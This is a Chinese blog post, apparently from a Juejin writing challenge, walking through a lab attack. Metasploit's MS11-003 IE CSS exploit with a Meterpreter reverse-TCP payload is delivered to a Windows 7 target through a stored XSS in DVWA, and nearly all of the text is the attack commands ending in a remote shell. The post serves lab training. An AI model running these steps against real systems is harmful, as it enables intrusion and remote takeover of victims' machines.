持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第3天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情
渗透机kali 192.168.1.11
靶机win7 192.168.1.8
服务器win08 192.168.1.9
kali使用命令msfconsole启动渗透平台,使用命令search windows/browser/ms11_003_ie_css_import
搜索ms11_003模块
use选择该模块
Show options
Set payload windows/meterpreter/reverse_tcp设置载荷模块
Set SRVHOST 192.168.1.11 设置本地监听ip
Set URIPATH ui 设置访问模块的具体地址(默认随机生成)
Set LHOST 192.168.1.11 设置载荷模块监听本地地址
设置模块目标,使用命令show targets查看支持的目标列表,使用命令set target1设置目标地址为Internet Explorer 8
设置好了,使用命令exploit -j后台启动模块,等待连接
kali输入命令firefox进入火狐浏览器
输入账号admin密码password进入DVWA网站
找到DVWA security 设置low 点击submit进行提交
在左边导航栏找到xxs(stored) F12打开审查元素切换到查看器Inspector搜索maxlength将后面的值改成500,也就是将最长长度改成了500
在name框输入test
在mesage框中输入 Click to Download
使用用靶机的浏览器访问该站点
先降低防护性为low
在左侧点击xss(stored),再点击网页上的Click to Download
回到kali发现上线了一个会话
使用命令sessions -i切换到会话2,使用shell开启终端
输入命令:chcp 65001将乱码改回正确的样式
成功拿shell